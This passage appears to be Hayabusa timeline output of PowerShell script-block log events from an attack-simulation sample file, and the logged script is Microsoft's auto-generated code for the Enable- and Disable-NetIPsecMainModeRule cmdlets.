[ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } 
Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDi",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh 
Scriptblock Log,"isplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 
'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDi",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"splayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', 
$__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecMainModeRule' -Alias '*' function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
